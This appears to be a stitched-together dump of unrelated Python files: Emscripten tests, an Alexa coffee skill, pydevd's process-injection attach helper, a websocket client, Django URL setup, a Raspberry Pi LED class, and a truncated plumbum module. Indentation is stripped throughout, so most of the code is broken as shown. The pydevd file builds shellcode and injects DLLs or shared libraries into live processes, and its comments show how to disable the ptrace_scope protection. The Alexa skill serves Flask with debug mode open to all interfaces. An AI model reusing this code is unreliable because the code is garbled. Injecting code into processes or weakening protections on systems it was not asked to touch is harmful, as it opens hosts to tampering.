self.btest(path_from_root('tests', 'emscripten_set_timeout_loop.c'), '0', args=['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'])
def test_emscripten_set_immediate(self):
self.btest(path_from_root('tests', 'emscripten_set_immediate.c'), '0')
def test_emscripten_set_immediate_loop(self):
self.btest(path_from_root('tests', 'emscripten_set_immediate_loop.c'), '0')
@requires_threads
def test_emscripten_set_interval(self):
self.btest(path_from_root('tests', 'emscripten_set_interval.c'), '0', args=['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'])
# Test emscripten_performance_now() and emscripten_date_now()
@requires_threads
def test_emscripten_performance_now(self):
self.btest(path_from_root('tests', 'emscripten_performance_now.c'), '0', args=['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'])
# Test emscripten_console_log(), emscripten_console_warn() and emscripten_console_error()
def test_emscripten_console_log(self):
self.btest(path_from_root('tests', 'emscripten_console_log.c'), '0', args=['--pre-js', path_from_root('tests', 'emscripten_console_log_pre.js')])
def test_emscripten_throw_number(self):
self.btest(path_from_root('tests', 'emscripten_throw_number.c'), '0', args=['--pre-js', path_from_root('tests', 'emscripten_throw_number_pre.js')])
def test_emscripten_throw_string(self):
self.btest(path_from_root('tests', 'emscripten_throw_string.c'), '0', args=['--pre-js', path_from_root('tests', 'emscripten_throw_string_pre.js')])
# Tests that Closure run in combination with -s ENVIRONMENT=web mode works with a minimal console.log() application
def test_closure_in_web_only_target_environment_console_log(self):
self.btest('minimal_hello.c', '0', args=['-s', 'ENVIRONMENT=web', '-O3', '--closure', '1'])
# Tests that Closure run in combination with -s ENVIRONMENT=web mode works with a small WebGL application
@requires_graphics_hardware
def test_closure_in_web_only_target_environment_webgl(self):
self.btest('webgl_draw_triangle.c', '0', args=['-lGL', '-s', 'ENVIRONMENT=web', '-O3', '--closure', '1'])
  # Tests that it is possible to load two asm.js compiled programs to one page when both --separate-asm and MODULARIZE=1 are used, by assigning
  # the pages different asm module names to ensure they do not conflict when being XHRed in.
@no_wasm_backend('this tests asm.js support')
def test_two_separate_asm_files_on_same_page(self):
html_file = open('main.html', 'w')
html_file.write(open(path_from_root('tests', 'two_separate_asm_files.html')).read().replace('localhost:8888', 'localhost:%s' % self.port))
html_file.close()
cmd = [PYTHON, EMCC, path_from_root('tests', 'modularize_separate_asm.c'), '-o', 'page1.js', '-s', 'WASM=0', '--separate-asm', '-s', 'MODULARIZE=1', '-s', 'EXPORT_NAME=Module1', '-s', 'SEPARATE_ASM_MODULE_NAME=ModuleForPage1["asm"]']
print(cmd)
subprocess.check_call(cmd)
cmd = [PYTHON, EMCC, path_from_root('tests', 'modularize_separate_asm.c'), '-o', 'page2.js', '-s', 'WASM=0', '--separate-asm', '-s', 'MODULARIZE=1', '-s', 'EXPORT_NAME=Module2', '-s', 'SEPARATE_ASM_MODULE_NAME=ModuleForPage2["asm"]']
print(cmd)
subprocess.check_call(cmd)
self.run_browser('main.html', None, '/report_result?1')
# Tests that it is possible to encapsulate asm.js compiled programs by using --separate-asm + MODULARIZE=1. See
# encapsulated_asmjs_page_load.html for the example.
@no_wasm_backend('this tests asm.js support')
def test_encapsulated_asmjs_page_load(self):
html_file = open('main.html', 'w')
html_file.write(open(path_from_root('tests', 'encapsulated_asmjs_page_load.html')).read().replace('localhost:8888', 'localhost:%s' % self.port))
html_file.close()
cmd = [PYTHON, EMCC, path_from_root('tests', 'modularize_separate_asm.c'), '-o', 'a.js', '-s', 'WASM=0', '--separate-asm', '-s', 'MODULARIZE=1', '-s', 'EXPORT_NAME=EmscriptenCode', '-s', 'SEPARATE_ASM_MODULE_NAME="var EmscriptenCode"']
print(cmd)
subprocess.check_call(cmd)
self.run_browser('main.html', None, '/report_result?1')
@no_wasm_backend('MINIMAL_RUNTIME not yet available in Wasm backend')
def test_no_declare_asm_module_exports_asmjs(self):
for minimal_runtime in [[], ['-s', 'MINIMAL_RUNTIME=1']]:
self.btest(path_from_root('tests', 'declare_asm_module_exports.cpp'), '1', args=['-s', 'DECLARE_ASM_MODULE_EXPORTS=0', '-s', 'ENVIRONMENT=web', '-O3', '--closure', '1', '-s', 'WASM=0'] + minimal_runtime)
@no_wasm_backend('MINIMAL_RUNTIME not yet available in Wasm backend')
def test_no_declare_asm_module_exports_wasm_minimal_runtime(self):
self.btest(path_from_root('tests', 'declare_asm_module_exports.cpp'), '1', args=['-s', 'DECLARE_ASM_MODULE_EXPORTS=0', '-s', 'ENVIRONMENT=web', '-O3', '--closure', '1', '-s', 'MINIMAL_RUNTIME=1'])
# Tests that the different code paths in src/shell_minimal_runtime.html all work ok.
@no_wasm_backend('MINIMAL_RUNTIME not yet available in Wasm backend')
def test_minimal_runtime_loader_shell(self):
args = ['-s', 'MINIMAL_RUNTIME=2']
for wasm in [[], ['-s', 'WASM=0', '--memory-init-file', '0'], ['-s', 'WASM=0', '--memory-init-file', '1']]:
for modularize in [[], ['-s', 'MODULARIZE=1']]:
print(str(args + wasm + modularize))
self.btest('minimal_hello.c', '0', args=args + wasm + modularize)
|
htcpcp-alexa.py
|
import threading
import requests
import pyalexa
import flask
import json
BASE_RESPONSE = {
"version": "1",
"response": {}
}
with open(".keys") as f:
keys = json.load(f)
APP_ID = keys["app_id"]
api = flask.Flask(__name__)
skill = pyalexa.Skill(app_id=APP_ID)
my_drink_id = -1
def do_brew(drink, creams=0, sugar=0):
global my_drink_id
data = {
"size": 6,
"k_cup": "yes please" if drink == "coffee" else "",
"tea_bag": "yes please" if drink == "tea" else "",
"sugar": int(sugar) if sugar else 0,
"creamer": int(creams) if creams else 0,
}
if my_drink_id != -1:
data["id"] = my_drink_id
res = requests.post("http://localhost/api/update/drink", json=data)
res.raise_for_status()
if "id" in res.json():
my_drink_id = res.json()["id"]
requests.post("http://localhost/api/brew/{}/1".format(my_drink_id))
@skill.launch
def launch(request):
return request.response(end=True, speech="Welcome to Breakfast Time! You can ask me to make coffee, with or without sugar and cream.")
@skill.end
def end(request):
return request.response(end=True, speech="Thanks for using Breakfast Time!")
@skill.intent("Brew")
def coffee(request):
creams = request.data().get("Cream", 0)
sugars = request.data().get("Sugar", 0)
drink = request.data().get("Drink", "coffee")
if creams == "?":
return request.response(end=False, speech="You want how much cream!?")
if sugars == "?":
return request.response(end=False, speech="You want how much sugar!?")
threading.Thread(target=do_brew, args=(drink, creams, sugars)).start()
return request.response(end=True, speech="Okay! One {} coming right up!".format(drink))
api.add_url_rule('/', 'pyalexa', skill.flask_target, methods=['POST'])
api.run('0.0.0.0', port=8081, debug=True)
|
add_code_to_python_process.py
|
r'''
Copyright: Brainwy Software Ltda.
License: EPL.
=============
Works for Windows relying on a fork of winappdbg which works in py2/3 (at least for the part we're interested in).
See: https://github.com/fabioz/winappdbg (py3 branch).
Note that the official branch for winappdbg is: https://github.com/MarioVilas/winappdbg, which should be used when it works in Py3.
A private copy is added here to make deployment easier, but changes should always be done upstream first.
Works for Linux relying on gdb.
Limitations:
============
Linux:
------
1. It is possible that ptrace is disabled: /etc/sysctl.d/10-ptrace.conf
Note that even after enabling it in /etc/sysctl.d/10-ptrace.conf (i.e.: setting
ptrace_scope=0), it may still be necessary to run the application that'll use ptrace (or
gdb in this case) as root (so, we must sudo the python which'll run this module).
See the example commands right after this docstring.
2. It currently doesn't work in debug builds (i.e.: python_d)
Other implementations:
- pyrasite.com:
GPL
Windows/linux (in Linux it also uses gdb to connect -- although the specifics are different as we use a dll to execute
code with the other threads stopped). Its Windows approach is more limited because it doesn't seem to deal properly with
Python 3 if threading is disabled.
- https://github.com/google/pyringe:
Apache v2.
Only linux/Python 2.
- http://pytools.codeplex.com:
Apache V2
Windows Only (but supports mixed mode debugging)
Our own code relies heavily on a part of it: http://pytools.codeplex.com/SourceControl/latest#Python/Product/PyDebugAttach/PyDebugAttach.cpp
to overcome some limitations of attaching and running code in the target python executable on Python 3.
See: attach.cpp
Linux: References if we wanted to use a pure-python debugger:
https://bitbucket.org/haypo/python-ptrace/
http://stackoverflow.com/questions/7841573/how-to-get-an-error-message-for-errno-value-in-python
Jugaad:
https://www.defcon.org/images/defcon-19/dc-19-presentations/Jakhar/DEFCON-19-Jakhar-Jugaad-Linux-Thread-Injection.pdf
https://github.com/aseemjakhar/jugaad
Something else (general and not Python related):
- http://www.codeproject.com/Articles/4610/Three-Ways-to-Inject-Your-Code-into-Another-Proces
Other references:
- https://github.com/haypo/faulthandler
- http://nedbatchelder.com/text/trace-function.html
- https://github.com/python-git/python/blob/master/Python/sysmodule.c (sys_settrace)
- https://github.com/python-git/python/blob/master/Python/ceval.c (PyEval_SetTrace)
- https://github.com/python-git/python/blob/master/Python/thread.c (PyThread_get_key_value)
To build the dlls needed on windows, visual studio express 13 was used (see compile_dll.bat)
See: attach_pydevd.py to attach the pydev debugger to a running python process.
'''
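# The ptrace restriction mentioned in the docstring above is controlled by the Yama LSM
# on most Linux distributions. A quick way to inspect/relax it at runtime (persist it via
# /etc/sysctl.d/10-ptrace.conf as noted above):
#
#   cat /proc/sys/kernel/yama/ptrace_scope        # 0 means unrestricted
#   sudo sysctl -w kernel.yama.ptrace_scope=0     # relax until next reboot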
# Note: to work with nasm compiling asm to code and decompiling to see asm with shellcode:
# x:\nasm\nasm-2.07-win32\nasm-2.07\nasm.exe
# nasm.asm&x:\nasm\nasm-2.07-win32\nasm-2.07\ndisasm.exe -b arch nasm
import ctypes
import os
import struct
import subprocess
import sys
import time
class AutoExit(object):
def __init__(self, on_exit):
self.on_exit = on_exit
def __enter__(self):
pass
def __exit__(self, *args):
self.on_exit()
class GenShellCodeHelper(object):
def __init__(self, is_64):
from winappdbg import compat
self.is_64 = is_64
self._code = []
if not is_64:
self._translations = {
'push esi': compat.b('\x56'),
'push eax': compat.b('\x50'),
'push ebp': compat.b('\x55'),
'push ebx': compat.b('\x53'),
'pop esi': compat.b('\x5E'),
'pop eax': compat.b('\x58'),
'pop ebp': compat.b('\x5D'),
'pop ebx': compat.b('\x5B'),
'mov esi': compat.b('\xBE'),
'mov eax': compat.b('\xB8'),
'mov ebp': compat.b('\xBD'),
'mov ebx': compat.b('\xBB'),
'call ebp': compat.b('\xFF\xD5'),
'call eax': compat.b('\xFF\xD0'),
'call ebx': compat.b('\xFF\xD3'),
'mov ebx,eax': compat.b('\x89\xC3'),
'mov eax,ebx': compat.b('\x89\xD8'),
'mov ebp,esp': compat.b('\x89\xE5'),
'mov esp,ebp': compat.b('\x89\xEC'),
'push dword': compat.b('\x68'),
'mov ebp,eax': compat.b('\x89\xC5'),
'mov eax,ebp': compat.b('\x89\xE8'),
'ret': compat.b('\xc3'),
}
else:
# Translate 64 bits
self._translations = {
'push rsi': compat.b('\x56'),
'push rax': compat.b('\x50'),
'push rbp': compat.b('\x55'),
'push rbx': compat.b('\x53'),
'push rsp': compat.b('\x54'),
'push rdi': compat.b('\x57'),
'pop rsi': compat.b('\x5E'),
'pop rax': compat.b('\x58'),
'pop rbp': compat.b('\x5D'),
'pop rbx': compat.b('\x5B'),
'pop rsp': compat.b('\x5C'),
'pop rdi': compat.b('\x5F'),
'mov rsi': compat.b('\x48\xBE'),
'mov rax': compat.b('\x48\xB8'),
'mov rbp': compat.b('\x48\xBD'),
'mov rbx': compat.b('\x48\xBB'),
'mov rdi': compat.b('\x48\xBF'),
'mov rcx': compat.b('\x48\xB9'),
'mov rdx': compat.b('\x48\xBA'),
'call rbp': compat.b('\xFF\xD5'),
'call rax': compat.b('\xFF\xD0'),
'call rbx': compat.b('\xFF\xD3'),
'mov rbx,rax': compat.b('\x48\x89\xC3'),
'mov rax,rbx': compat.b('\x48\x89\xD8'),
'mov rbp,rsp': compat.b('\x48\x89\xE5'),
'mov rsp,rbp': compat.b('\x48\x89\xEC'),
'mov rcx,rbp': compat.b('\x48\x89\xE9'),
'mov rbp,rax': compat.b('\x48\x89\xC5'),
'mov rax,rbp': compat.b('\x48\x89\xE8'),
'mov rdi,rbp': compat.b('\x48\x89\xEF'),
'ret': compat.b('\xc3'),
}
def push_addr(self, addr):
self._code.append(self.translate('push dword'))
self._code.append(addr)
def push(self, register):
self._code.append(self.translate('push %s' % register))
return AutoExit(lambda: self.pop(register))
def pop(self, register):
self._code.append(self.translate('pop %s' % register))
def mov_to_register_addr(self, register, addr):
self._code.append(self.translate('mov %s' % register))
self._code.append(addr)
def mov_register_to_from(self, register_to, register_from):
self._code.append(self.translate('mov %s,%s' % (register_to, register_from)))
def call(self, register):
self._code.append(self.translate('call %s' % register))
def preserve_stack(self):
self.mov_register_to_from('ebp', 'esp')
return AutoExit(lambda: self.restore_stack())
def restore_stack(self):
self.mov_register_to_from('esp', 'ebp')
def ret(self):
self._code.append(self.translate('ret'))
def get_code(self):
from winappdbg import compat
return compat.b('').join(self._code)
def translate(self, code):
return self._translations[code]
def pack_address(self, address):
if self.is_64:
return struct.pack('<q', address)
else:
return struct.pack('<L', address)
def convert(self, code):
'''
Note:
If the shellcode starts with '66' controls, it needs to be changed to add [BITS 32] or
[BITS 64] to the start.
To use:
convert("""
55
53
50
BDE97F071E
FFD5
BDD67B071E
FFD5
5D
5B
58
C3
""")
'''
        code = code.replace(' ', '')
        code = ''.join(code.splitlines())  # Remove new lines
        # str.decode('hex') only exists on Python 2; binascii.unhexlify works on both 2 and 3.
        import binascii
        return binascii.unhexlify(code)
def resolve_label(process, label):
for i in range(3):
try:
address = process.resolve_label(label)
assert address
return address
except:
try:
process.scan_modules()
except:
pass
if i == 2:
raise
time.sleep(2)
def is_python_64bit():
return (struct.calcsize('P') == 8)
def is_mac():
import platform
return platform.system() == 'Darwin'
def run_python_code_windows(pid, python_code, connect_debugger_tracing=False, show_debug_info=0):
assert '\'' not in python_code, 'Having a single quote messes with our command.'
from winappdbg import compat
from winappdbg.process import Process
if not isinstance(python_code, compat.bytes):
python_code = compat.b(python_code)
process = Process(pid)
bits = process.get_bits()
is_64 = bits == 64
if is_64 != is_python_64bit():
raise RuntimeError("The architecture of the Python used to connect doesn't match the architecture of the target.\n"
"Target 64 bits: %s\n"
"Current Python 64 bits: %s" % (is_64, is_python_64bit()))
print('Connecting to %s bits target' % (bits,))
assert resolve_label(process, compat.b('PyGILState_Ensure'))
filedir = os.path.dirname(__file__)
if is_64:
suffix = 'amd64'
else:
suffix = 'x86'
target_dll = os.path.join(filedir, 'attach_%s.dll' % suffix)
if not os.path.exists(target_dll):
raise RuntimeError('Could not find dll file to inject: %s' % target_dll)
print('Injecting dll')
process.inject_dll(target_dll.encode('mbcs'))
print('Dll injected')
process.scan_modules()
attach_func = resolve_label(process, compat.b('AttachAndRunPythonCode'))
assert attach_func
print('Allocating code in target process')
code_address = process.malloc(len(python_code))
assert code_address
print('Writing code in target process')
process.write(code_address, python_code)
print('Allocating return value memory in target process')
return_code_address = process.malloc(ctypes.sizeof(ctypes.c_int))
assert return_code_address
CONNECT_DEBUGGER = 2
startup_info = 0
if show_debug_info:
SHOW_DEBUG_INFO = 1
startup_info |= SHOW_DEBUG_INFO # Uncomment to show debug info
if connect_debugger_tracing:
startup_info |= CONNECT_DEBUGGER
process.write_int(return_code_address, startup_info)
helper = GenShellCodeHelper(is_64)
if is_64:
# Interesting read: http://msdn.microsoft.com/en-us/library/ms235286.aspx
# Overview of x64 Calling Conventions (for windows: Linux is different!)
# Register Usage: http://msdn.microsoft.com/en-us/library/9z1stfyw.aspx
# The registers RAX, RCX, RDX, R8, R9, R10, R11 are considered volatile and must be considered destroyed on function calls (unless otherwise safety-provable by analysis such as whole program optimization).
#
# The registers RBX, RBP, RDI, RSI, RSP, R12, R13, R14, and R15 are considered nonvolatile and must be saved and restored by a function that uses them.
#
# Important: RCX: first int argument
with helper.push('rdi'): # This one REALLY must be pushed/poped
with helper.push('rsp'):
with helper.push('rbp'):
with helper.push('rbx'):
with helper.push('rdi'): # Note: pop is automatic.
helper.mov_to_register_addr('rcx', helper.pack_address(code_address))
helper.mov_to_register_addr('rdx', helper.pack_address(return_code_address))
helper.mov_to_register_addr('rbx', helper.pack_address(attach_func))
helper.call('rbx')
else:
with helper.push('eax'): # Note: pop is automatic.
with helper.push('ebp'):
with helper.push('ebx'):
with helper.preserve_stack():
# Put our code as a parameter in the stack (on x86, we push parameters to
# the stack)
helper.push_addr(helper.pack_address(return_code_address))
helper.push_addr(helper.pack_address(code_address))
helper.mov_to_register_addr('ebx', helper.pack_address(attach_func))
helper.call('ebx')
helper.ret()
code = helper.get_code()
# Uncomment to see the disassembled version of what we just did...
# with open('f.asm', 'wb') as stream:
# stream.write(code)
#
# exe = r'x:\nasm\nasm-2.07-win32\nasm-2.07\ndisasm.exe'
# if is_64:
# arch = '64'
# else:
# arch = '32'
#
# subprocess.call((exe + ' -b %s f.asm' % arch).split())
print('Injecting code to target process')
thread, _thread_address = process.inject_code(code, 0)
timeout = None # Could receive timeout in millis.
print('Waiting for code to complete')
thread.wait(timeout)
return_code = process.read_int(return_code_address)
if return_code == 0:
print('Attach finished successfully.')
else:
print('Error when injecting code in target process. Error code: %s (on windows)' % (return_code,))
process.free(thread.pInjectedMemory)
process.free(code_address)
process.free(return_code_address)
return return_code
def run_python_code_linux(pid, python_code, connect_debugger_tracing=False, show_debug_info=0):
assert '\'' not in python_code, 'Having a single quote messes with our command.'
filedir = os.path.dirname(__file__)
# Valid arguments for arch are i386, i386:x86-64, i386:x64-32, i8086,
# i386:intel, i386:x86-64:intel, i386:x64-32:intel, i386:nacl,
# i386:x86-64:nacl, i386:x64-32:nacl, auto.
if is_python_64bit():
suffix = 'amd64'
arch = 'i386:x86-64'
else:
suffix = 'x86'
arch = 'i386'
print('Attaching with arch: %s'% (arch,))
target_dll = os.path.join(filedir, 'attach_linux_%s.so' % suffix)
target_dll = os.path.normpath(target_dll)
if not os.path.exists(target_dll):
raise RuntimeError('Could not find dll file to inject: %s' % target_dll)
gdb_threads_settrace_file = find_helper_script(filedir, 'gdb_threads_settrace.py')
# Note: we currently don't support debug builds
is_debug = 0
# Note that the space in the beginning of each line in the multi-line is important!
cmd = [
'gdb',
'--nw', # no gui interface
'--nh', # no ~/.gdbinit
'--nx', # no .gdbinit
# '--quiet', # no version number on startup
'--pid',
str(pid),
'--batch',
# '--batch-silent',
]
cmd.extend(["--eval-command='set scheduler-locking off'"]) # If on we'll deadlock.
cmd.extend(["--eval-command='set architecture %s'" % arch])
cmd.extend([
"--eval-command='call dlopen(\"%s\", 2)'" % target_dll,
"--eval-command='call DoAttach(%s, \"%s\", %s)'" % (
is_debug, python_code, show_debug_info)
])
if connect_debugger_tracing:
cmd.extend([
"--command='%s'" % (gdb_threads_settrace_file,),
])
#print ' '.join(cmd)
env = os.environ.copy()
# Remove the PYTHONPATH (if gdb has a builtin Python it could fail if we
# have the PYTHONPATH for a different python version or some forced encoding).
env.pop('PYTHONIOENCODING', None)
env.pop('PYTHONPATH', None)
print('Running: %s' % (' '.join(cmd)))
p = subprocess.Popen(
' '.join(cmd),
shell=True,
env=env,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
)
print('Running gdb in target process.')
out, err = p.communicate()
print('stdout: %s' % (out,))
print('stderr: %s' % (err,))
return out, err
def find_helper_script(filedir, script_name):
lldb_threads_settrace_file = os.path.join(filedir, 'linux', script_name)
lldb_threads_settrace_file = os.path.normpath(lldb_threads_settrace_file)
if not os.path.exists(lldb_threads_settrace_file):
raise RuntimeError('Could not find file to settrace: %s' % lldb_threads_settrace_file)
return lldb_threads_settrace_file
def run_python_code_mac(pid, python_code, connect_debugger_tracing=False, show_debug_info=0):
assert '\'' not in python_code, 'Having a single quote messes with our command.'
filedir = os.path.dirname(__file__)
# Valid arguments for arch are i386, i386:x86-64, i386:x64-32, i8086,
# i386:intel, i386:x86-64:intel, i386:x64-32:intel, i386:nacl,
# i386:x86-64:nacl, i386:x64-32:nacl, auto.
if is_python_64bit():
suffix = 'x86_64.dylib'
arch = 'i386:x86-64'
else:
suffix = 'x86.dylib'
arch = 'i386'
print('Attaching with arch: %s'% (arch,))
target_dll = os.path.join(filedir, 'attach_%s' % suffix)
target_dll = os.path.normpath(target_dll)
if not os.path.exists(target_dll):
raise RuntimeError('Could not find dll file to inject: %s' % target_dll)
lldb_threads_settrace_file = find_helper_script(filedir, 'lldb_threads_settrace.py')
lldb_prepare_file = find_helper_script(filedir, 'lldb_prepare.py')
# Note: we currently don't support debug builds
is_debug = 0
# Note that the space in the beginning of each line in the multi-line is important!
cmd = [
'lldb',
'--no-lldbinit', # Do not automatically parse any '.lldbinit' files.
# '--attach-pid',
# str(pid),
# '--arch',
# arch,
'--script-language',
'Python'
# '--batch-silent',
]
cmd.extend([
"-o 'process attach --pid %d'"%pid,
"-o 'command script import \"%s\"'" % (lldb_prepare_file,),
"-o 'load_lib_and_attach \"%s\" %s \"%s\" %s'" % (target_dll,
is_debug, python_code, show_debug_info),
])
if connect_debugger_tracing:
cmd.extend([
# "-o 'expr (int) SetSysTraceFunc(0, 0);'",
"-o 'command script import \"%s\"'" % (lldb_threads_settrace_file,),
])
cmd.extend([
"-o 'process detach'",
"-o 'script import os; os._exit(1)'",
])
#print ' '.join(cmd)
env = os.environ.copy()
# Remove the PYTHONPATH (if gdb has a builtin Python it could fail if we
# have the PYTHONPATH for a different python version or some forced encoding).
env.pop('PYTHONIOENCODING', None)
env.pop('PYTHONPATH', None)
print('Running: %s' % (' '.join(cmd)))
p = subprocess.Popen(
' '.join(cmd),
shell=True,
env=env,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
)
print('Running lldb in target process.')
out, err = p.communicate()
print('stdout: %s' % (out,))
print('stderr: %s' % (err,))
return out, err
if sys.platform == 'win32':
run_python_code = run_python_code_windows
elif is_mac():
run_python_code = run_python_code_mac
else:
run_python_code = run_python_code_linux
def test():
print('Running with: %s' % (sys.executable,))
code = '''
import os, time, sys
print(os.getpid())
#from threading import Thread
#Thread(target=str).start()
if __name__ == '__main__':
while True:
time.sleep(.5)
sys.stdout.write('.\\n')
sys.stdout.flush()
'''
p = subprocess.Popen([sys.executable, '-u', '-c', code])
try:
code = 'print("It worked!")\n'
# Real code will be something as:
# code = '''import sys;sys.path.append(r'X:\winappdbg-code\examples'); import imported;'''
run_python_code(p.pid, python_code=code)
time.sleep(3)
finally:
p.kill()
def main(args):
# Otherwise, assume the first parameter is the pid and anything else is code to be executed
# in the target process.
pid = int(args[0])
del args[0]
python_code = ';'.join(args)
# Note: on Linux the python code may not have a single quote char: '
run_python_code(pid, python_code)
if __name__ == '__main__':
args = sys.argv[1:]
if not args:
print('Expected pid and Python code to execute in target process.')
else:
if '--test' == args[0]:
test()
else:
main(args)
|
ws.py
|
import threading
import websocket
class WSClient:
def __init__(self, url: str, on_message=None, on_open=None, on_close=None, on_error=None):
self.ws = websocket.WebSocketApp(
url,
on_open=self._default_on_open,
on_close=self._default_on_close,
on_error=self._default_on_error,
on_message=self._default_on_message,
)
self._url = url
self._handle_message = on_message
self._handle_open = on_open
self._handle_close = on_close
self._handle_error = on_error
self._run_thread = None
def run(self):
self.ws.run_forever()
def run_async(self):
self._run_thread = threading.Thread(target=self.run)
self._run_thread.start()
def close(self):
self.ws.close()
if self._run_thread:
self._run_thread.join()
def _default_on_message(self, ws, message):
if self._handle_message:
self._handle_message(message)
def _default_on_open(self, ws):
if self._handle_open:
self._handle_open()
def _default_on_close(self, ws, close_status_code, close_msg):
if self._handle_close:
self._handle_close()
def _default_on_error(self, ws, error):
if self._handle_error:
self._handle_error(error)
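# A minimal usage sketch, not part of the original module: the URL below is a placeholder
# endpoint and the handlers just print what they receive.
if __name__ == "__main__":
    import time

    def _print_message(message):
        print("received:", message)

    client = WSClient(
        "ws://localhost:8080/ws",   # hypothetical endpoint
        on_message=_print_message,
        on_open=lambda: print("connection opened"),
        on_close=lambda: print("connection closed"),
    )
    client.run_async()  # run the websocket loop on a background thread
    time.sleep(5)       # give it a few seconds to receive messages
    client.close()      # close the socket and join the background thread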
|
urls.py
|
import os
import threading
from django.contrib import admin
from django.urls import path, include
from django.views.generic.base import TemplateView
from django.contrib.auth.decorators import login_required
from orchestrator.monitoring import file_trigger_monitor, schedule_trigger_monitor, email_imap_trigger_monitor, email_outlook_trigger_monitor, botflow_execution_monitor
def start_file_trigger_monitor():
    t = threading.Thread(target=file_trigger_monitor, daemon=True)
    t.start()
def start_schedule_trigger_monitor():
    t = threading.Thread(target=schedule_trigger_monitor, daemon=True)
    t.start()
def start_email_imap_trigger_monitor():
    t = threading.Thread(target=email_imap_trigger_monitor, daemon=True)
    t.start()
def start_email_outlook_trigger_monitor():
    t = threading.Thread(target=email_outlook_trigger_monitor, daemon=True)
    t.start()
def start_botflow_execution_monitor():
    t = threading.Thread(target=botflow_execution_monitor, daemon=True)
    t.start()
urlpatterns = [
path('api/0/', include('api0.urls')),
path('dashboard/', include('dashboard.urls')),
path('', admin.site.urls),
]
if os.path.exists('logs\\error_log.txt'):
os.remove('logs\\error_log.txt')
if os.path.exists('logs\\error_bot_status.txt'):
os.remove('logs\\error_bot_status.txt')
start_file_trigger_monitor()
start_schedule_trigger_monitor()
start_email_imap_trigger_monitor()
start_email_outlook_trigger_monitor()
start_botflow_execution_monitor()
|
status.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# Copyright 2020 by Murray Altheim. All rights reserved. This file is part of
# the Robot OS project and is released under the "Apache Licence, Version 2.0".
# Please see the LICENSE file included as part of this package.
#
# author: Murray Altheim
# created: 2020-01-17
# modified: 2020-01-17
#
import time, threading
#import RPi.GPIO as GPIO
#from .import_gpio import *
import lib.import_gpio
from .logger import Level, Logger
# ..............................................................................
class Status():
'''
Status Task: turns the status light on and off when it is set enabled or disabled.
This also provides a thread-based blinker using blink(), halted by disable().
Note that its status light functionality is not affected by enable or disable,
as the purpose of this behaviour is to show that the overall OS is running.
'''
# ..........................................................................
def __init__(self, config, GPIO, level):
self._log = Logger('status', level)
self._log.debug('initialising...')
if config is None:
raise ValueError('no configuration provided.')
_config = config['ros'].get('status')
self._led_pin = _config.get('led_pin')
self.GPIO = GPIO
self.GPIO.setwarnings(False)
self.GPIO.setmode(GPIO.BCM)
self.GPIO.setup(self._led_pin, GPIO.OUT, initial=GPIO.LOW)
self._blink_thread = None
self._blinking = False
self._log.info('ready.')
# ..........................................................................
def __blink__(self):
'''
The blinking thread.
'''
while self._blinking:
self.GPIO.output(self._led_pin,True)
time.sleep(0.5)
self.GPIO.output(self._led_pin,False)
time.sleep(0.5)
self._log.info('blink complete.')
# ..........................................................................
def blink(self, active):
if active:
if self._blink_thread is None:
self._log.debug('starting blink...')
self._blinking = True
self._blink_thread = threading.Thread(target=Status.__blink__, args=[self,])
self._blink_thread.start()
else:
self._log.warning('ignored: blink already started.')
else:
if self._blink_thread is None:
self._log.debug('ignored: blink thread does not exist.')
else:
self._log.info('stop blinking...')
self._blinking = False
self._blink_thread.join()
self._blink_thread = None
self._log.info('blink thread ended.')
# ..........................................................................
def enable(self):
self._log.info('enable status light.')
self.GPIO.output(self._led_pin, True)
# ..........................................................................
def disable(self):
self._log.info('disable status light.')
self.GPIO.output(self._led_pin,False)
self._blinking = False
# ..........................................................................
def close(self):
self._log.info('closing status light...')
self._blinking = False
self.GPIO.output(self._led_pin,False)
self._log.info('status light closed.')
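    # Rough usage sketch (not part of the original module): assumes an RPi.GPIO-compatible
    # module and a config whose ros/status section provides 'led_pin'; the pin number and
    # log level below are only illustrative.
    #
    #   import RPi.GPIO as GPIO
    #   config = {'ros': {'status': {'led_pin': 27}}}
    #   status = Status(config, GPIO, Level.INFO)
    #   status.enable()       # steady status light on
    #   status.blink(True)    # start the blink thread
    #   time.sleep(5)
    #   status.blink(False)   # stop blinking and join the thread
    #   status.close()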
#EOF
|
processes.py
|
# -*- coding: utf-8 -*-
import atexit
import heapq
import sys
import time
from threading import Thread
from plumbum.lib import IS_WIN32, six
if sys.version_info >= (3,):
from io import StringIO
from queue import Empty as QueueEmpty
from queue import Queue
else:
from cStringIO import StringIO
from Queue import Empty as QueueEmpty
from Queue import Queue
# ===================================================================================================
# utility functions
# ===================================================================================================
def _check_process(proc, retcode, timeout, stdout, stderr):
proc.verify(retcode, timeout, stdout, stderr)
return proc.returncode, stdout, stderr
def _iter_lines_posix(proc, decode, linesize, line_timeout=None):
try:
from selectors import EVENT_READ, DefaultSelector
except ImportError:
# Pre Python 3.4 implementation
from select import select
def selector():
while True:
rlist, _, _ = select([proc.stdout, proc.stderr], [], [], line_timeout)
if not rlist and line_timeout:
raise ProcessLineTimedOut(
"popen line timeout expired",
getattr(proc, "argv", None),
getattr(proc, "machine", None),
)
for stream in rlist:
yield (stream is proc.stderr), decode(stream.readline(linesize))
else:
# Python 3.4 implementation
def selector():
sel = DefaultSelector()
sel.register(proc.stdout, EVENT_READ, 0)
sel.register(proc.stderr, EVENT_READ, 1)
while True:
ready = sel.select(line_timeout)
if not ready and line_timeout:
raise ProcessLineTimedOut(
"popen line timeout expired",
getattr(proc, "argv", None),
getattr(proc, "machine", None),
)
for key, mask in ready:
yield key.data, decode(key.fileobj.readline(linesize))
for ret in selector():
yield ret
if proc.poll() is not None:
break
for line in proc.stdout:
yield 0, decode(line)
for line in proc.stderr:
yield 1, decode(line)
def _iter_lines_win32(proc, decode, linesize, line_timeout=None):
class Piper(Thread):
def __init__(self, fd, pipe):
super().__init__(name="PlumbumPiper%sThread" % fd)
self.pipe = pipe
self.fd = fd
self.empty = False
self.daemon = True
super().start()
def read_from_pipe(self):
return self.pipe.readline(linesize)
def run(self):
for line in iter(self.read_from_pipe, b""):
queue.put((self.fd, decode(line)))
# self.pipe.close()
if line_timeout is None:
line_timeout = float("inf")
queue = Queue()
pipers = [Piper(0, proc.stdout), Piper(1, proc.stderr)]
last_line_ts = time.time()
empty = True
while True:
try:
